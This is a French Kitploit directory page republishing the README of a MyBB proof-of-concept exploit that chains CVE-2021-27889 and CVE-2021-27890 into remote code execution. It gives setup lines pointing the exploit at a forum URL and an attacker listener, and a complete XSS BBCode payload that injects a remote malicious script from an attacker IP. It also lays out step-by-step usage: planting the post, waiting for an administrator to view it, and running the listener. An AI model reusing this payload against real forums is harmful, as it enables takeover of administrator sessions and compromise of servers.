Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/xiaopan233/mybb-xss_sql_rce-poc
Génération de PayloadsExploitationExploitation d'Applications Web
GitHubxiaopan233/mybb-xss_sql_rce-poc

Mybb-XSS_SQL_RCE-POC

Mybb associe CVE-2021-27890 et CVE-2021-27889 à RCE poc

Voir le dépôt
102il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Mybb-XSS_SQL_RCE_POC

Mybb associe CVE-2021-27890 & CVE-2021-27889 au POC RCE

Avant utilisation :

Il y a deux fichiers ici : 1.js et attack_listen.py

Vous devez modifier ces deux fichiers :

1.js :

modifiez l'URL du forum Mybb et l'URL d'attaque :

root@kitploit:~
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py

attack_listen.py :

modifiez l'hôte d'attaque et le port d'attaque :

root@kitploit:~
attack_host = '192.168.92.165'
attack_port = 8080

Utilisation :

CVE-2021-27889 est une XSS. Vous devez injecter la charge utile suivante dans « New Post Thread », « Reply » ou « Private Messages » avant de lancer l'attaque. Dans cette démo, j'envoie la charge utile dans « New Post Thread ».

Notez que 192.168.92.165 est l'adresse IP du serveur malveillant, vous devez la modifier.

root@kitploit:~
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]


Maintenant, notre JS malveillant 1.js est injecté avec succès. Ensuite, nous devons attendre qu'un administrateur consulte ce message avec le cookie de sa session d'administration connectée.

Notez que l'utilisateur administrateur n'a pas nécessairement besoin de se connecter à la page du forum.


Pendant ce temps d'attente, nous devons exécuter "attack_listen.py" sur notre machine d'attaque, pour identifier si l'utilisateur administrateur a été attaqué.

root@kitploit:~
python3 attack_listen.py

Lorsque l'utilisateur administrateur consulte le message malveillant, le JS malveillant lancera l'attaque :


Nous pouvons recevoir les informations sur notre machine d'attaque :

Télécharger l’outil